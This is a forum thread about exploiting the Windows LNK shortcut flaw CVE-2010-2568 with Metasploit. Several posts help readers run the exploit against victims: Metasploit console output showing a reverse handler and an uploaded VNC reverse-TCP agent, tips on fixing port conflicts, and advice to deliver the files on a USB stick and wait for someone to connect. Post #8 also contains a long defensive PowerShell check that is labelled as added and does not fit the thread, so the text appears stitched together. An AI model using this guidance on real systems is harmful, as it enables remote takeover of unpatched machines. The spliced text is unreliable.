
Thread: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

  #1 (Junior Member, joined Mar 2009, 77 posts)

    See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    I've posted a new blog about the Windows LNK vulnerability (CVE-2010-2568) and how you can protect yourself or your customers against this vuln.

    Metasploit released an exploit for it in the newest revision.
    In the video I just show how to use the browser way, but you can also put the files on a USB stick and own your victim this way.
    Last edited by hardez; 03-24-2011 at 05:33 AM.

  #2 Archangel-Amael (Super Moderator, joined Jan 2010, location Somewhere, 8,012 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Thread moved from beginner section to here.
    To be successful here you should read all of the following:
    Forum Rules
    Forum FAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

  #3 (Junior Member, joined Apr 2008, 36 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    The autoplay feature is disabled by default in Windows 7, so the lnk file using desktop.ini doesn't work.

    I tested this on two PCs with Win7.

    Win7 is vulnerable to this exploit, but it didn't work for me.

  #4 (Junior Member, joined Mar 2009, 77 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    I thought that this is the "new" and "dangerous" thing about this exploit: that you don't need any autostart options, because Windows has a flaw in how it interprets the icon of the file!
    So it's executed as soon as Windows tries to load the icon of the link!
    Last edited by hardez; 07-20-2010 at 07:49 PM.

  #5 (Just burned his ISO, joined Jul 2010, 12 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Excuse my noob-ness, but the original post points toward some files you can put on a USB stick to execute this vulnerability. Where might one find such files? Or are they included with Metasploit and located somewhere in the Metasploit directory?

  #6 ravbyte (Just burned his ISO, joined Jul 2010, location Guatemala, 20 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Quote Originally Posted by Radar_mX:
    > The autoplay feature is disabled by default in Windows 7, so the lnk file using desktop.ini doesn't work.
    >
    > I tested this on two PCs with Win7.
    >
    > Win7 is vulnerable to this exploit, but it didn't work for me.

    Did you test on a Win XP? Maybe you skipped something or did something wrong. I read that all Windows versions are vulnerable, no matter if you or the OS disables autorun for external USB devices. Regards.

    PS: Mods, can I post a link with technical information? It's not of my authorship.

  #7 (Junior Member, joined Feb 2010, 26 posts)


    Hi Hardez,
    (Great video)
    Just watched your video and tried to reproduce it, but I'm missing something.

    I can almost complete the exploit, but it binds to my external card as an endpoint.

    Code:
    meterpreter > run vnc
    [*] Creating a VNC reverse tcp stager: LHOST=10.0.0.95 LPORT=4545)
    [*] Running payload handler
    [*] VNC stager executable 73802 bytes long
    [*] Uploaded the VNC agent to C:\WINDOWS\TEMP\mUCfWD.exe (must be deleted manually)
    [*] Executing the VNC agent with endpoint 10.0.0.95:4545...
    So I think the problem is that it is binding to my physical address and not to my VBox address.

    So I changed the srvhost in options to 192.168.56.1,
    but then I get:
    Code:
    msf exploit(ms10_xxx_windows_shell_lnk_execute) > set srvhost 192.168.56.1
    srvhost => 192.168.56.1
    msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
    [*] Exploit running as background job.
    
    [-] Handler failed to bind to 192.168.56.1:4444
    [-] Handler failed to bind to 0.0.0.0:4444
    [-] Exploit exception: The address is already in use (0.0.0.0:4444).
    Sorry if this is in the wrong section, but it was in the noobs section, and I know this is certainly a noob question, so I'm not sure... Any help would be appreciated.

    Oh yes, I can open a VNC session with no problems using the run one_vnc.rb exploit, so I guess I have the right software?

    cheers all

    Hi Hardez, great video. I just have a couple of questions; they are noob questions, but since the video was moved here I'd still like to ask.

    I'm following the exploit, but instead of launching the exploit and binding to my VBox adapter, the exploit listens on my physical adapter on a different subnet, so I can't trigger the vulnerability.

    I tried to change the srvhost in options, but still no go!

    Here's what I tried:
    Code:
    msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
    [*] Exploit running as background job.
    [*] Started reverse handler on 192.168.56.1:4444
    [*]
    [*] Send vulnerable clients to \\10.0.0.95\KfTO\.
    [*] Or, get clients to save and render the icon of http://<your host>/<anything>.lnk
    [*]
    [*] Using URL: http://0.0.0.0:80/
    [*]  Local IP: http://10.0.0.95:80/
    [*] Server started.
    So my question is: how do I change the local IP from 10.0.0.95:80 to 192.168.56.1:80?

    I really appreciate the video, and any feedback would probably help other noobs too.

    Also, once the vuln is executed, does that automatically start a VNC viewer like the one_vnc.rb exploit
    from room362?
    hxxp://www.room362.com/blog/month/december-2009

    cheers again
    Last edited by lupin; 07-21-2010 at 07:26 AM. Reason: Merging...

  #8 (Junior Member, joined Mar 2009, 77 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    @Onemajorflaw, no need to excuse yourself.
    Like ravbyte said, it doesn't matter whether you switch autostart on or off, because Windows executes the exploit as soon as it finds the lnk file, and that's the moment you plug in the USB drive.
    The video and the Metasploit version of this exploit are designed for exploiting by WebDAV, but there is a version (the original one, for example) that is designed for USB.
    I already asked HD Moore (coder of Metasploit) whether there will be a version for USB, but he hasn't answered till now.

    But you can run the exploit, open the WebDAV from within BackTrack and copy the files to USB; the only thing you have to do is keep running msfconsole till someone connects.

    @andytof47
    What I understand is that you run BackTrack in a VM, right? And the IP of BT is 192.168.56.1? But it binds to 10.blabla?
    Is the NIC of the VM in bridged mode?
    If not, do so, because otherwise VMware/VirtualBox does NAT, and I don't know whether this works or not with Metasploit.

    To flaw #2: Metasploit can only bind one port a session. So try another port like 4443 or restart Metasploit; then it should work.
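
    Since the thread is about protecting against CVE-2010-2568 and the post above explains why the trigger is icon parsing (not autorun) and why the Metasploit module needs WebDAV, here is an added defender-side check that is not from the thread, the video or Metasploit. It reports whether a Windows host has the MS10-046 update (KB2286198) and, failing that, whether the two workarounds from Microsoft Security Advisory 2286198 (cleared lnkfile icon handler, disabled WebClient service) are in place; it assumes an elevated Windows PowerShell prompt on the host being checked.

```powershell
# Added example (not from the thread, the video or Metasploit): report whether a Windows
# host is still exposed to CVE-2010-2568. Assumes an elevated Windows PowerShell prompt.

function Test-Ms10046Installed {
    # The permanent fix: the MS10-046 update (KB2286198) changes how Explorer validates .lnk files.
    $fix = Get-HotFix -Id 'KB2286198' -ErrorAction SilentlyContinue
    if ($fix) { return "KB2286198 installed on $($fix.InstalledOn) (patched)" }
    return 'KB2286198 not found (unpatched)'
}

function Test-LnkIconHandlerWorkaround {
    # Workaround 1: clearing the (Default) value of this key stops Explorer from loading the
    # shortcut icon handler, so a crafted .lnk is never parsed for its icon when a folder,
    # USB drive or WebDAV share is displayed. Side effect: all shortcuts show a generic icon.
    $key = 'Registry::HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler'
    if (-not (Test-Path $key)) { return 'lnkfile IconHandler key absent (workaround applied)' }
    $clsid = (Get-Item $key).GetValue('')
    if ([string]::IsNullOrEmpty($clsid)) { return 'lnkfile IconHandler cleared (workaround applied)' }
    return "lnkfile IconHandler = $clsid (shortcut icons still rendered, workaround missing)"
}

function Test-WebClientWorkaround {
    # Workaround 2: the \\host\share\ delivery used by the Metasploit module relies on the
    # victim's WebClient (WebDAV redirector) service; disabling it blocks that path.
    # Get-WmiObject is used so the check also runs on PowerShell 2.0 (Windows 7 era).
    $svc = Get-WmiObject -Class Win32_Service -Filter "Name='WebClient'"
    if ($null -eq $svc) { return 'WebClient service not present (workaround applied)' }
    if ($svc.StartMode -eq 'Disabled' -and $svc.State -ne 'Running') {
        return 'WebClient disabled and stopped (workaround applied)'
    }
    return "WebClient is $($svc.State), start mode $($svc.StartMode) (WebDAV delivery possible)"
}

# A host is exposed if it is unpatched AND the icon-handler workaround is missing;
# the WebClient line only tells you whether the WebDAV delivery route is open.
Test-Ms10046Installed
Test-LnkIconHandlerWorkaround
Test-WebClientWorkaround
```

    The USB delivery route described in the post does not depend on WebClient, so the icon-handler line (or the patch) is the one that matters for removable media.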

  #9 (Just burned his ISO, joined Jul 2010, 12 posts)


    Quote Originally Posted by hardez:
    > @Onemajorflaw, no need to excuse yourself.
    > Like ravbyte said, it doesn't matter whether you switch autostart on or off, because Windows executes the exploit as soon as it finds the lnk file, and that's the moment you plug in the USB drive.
    > The video and the Metasploit version of this exploit are designed for exploiting by WebDAV, but there is a version (the original one, for example) that is designed for USB.
    > I already asked HD Moore (coder of Metasploit) whether there will be a version for USB, but he hasn't answered till now.
    >
    > But you can run the exploit, open the WebDAV from within BackTrack and copy the files to USB; the only thing you have to do is keep running msfconsole till someone connects.

    Ah, I see! Thanks for the reply; it makes MUCH more sense to me now! I'm going to have to try this out once I get off of work. Thanks again.

    Sorry for the double post, but no one has been posting here!

    I successfully executed this exploit on a Windows 7 machine, but the only problem is that a session is never opened. The lnk and dll file are opened on the victim PC, and on my BackTrack machine it shows someone connecting, and it shows the requests being sent and received, but nothing happens after that. Any suggestions?
    Last edited by Archangel-Amael; 07-29-2010 at 11:07 AM.

  #10 erdmaennchen (Just burned his ISO, joined Jul 2010, 15 posts)

    Re: See Windows LNK vulnerability (CVE-2010-2568) in action and learn how to protect

    Actually, this exploit is detected by Microsoft Essentials and Avira AntiVir. I just tested these two programs with the newest definitions.

    Without them the attack was successful.
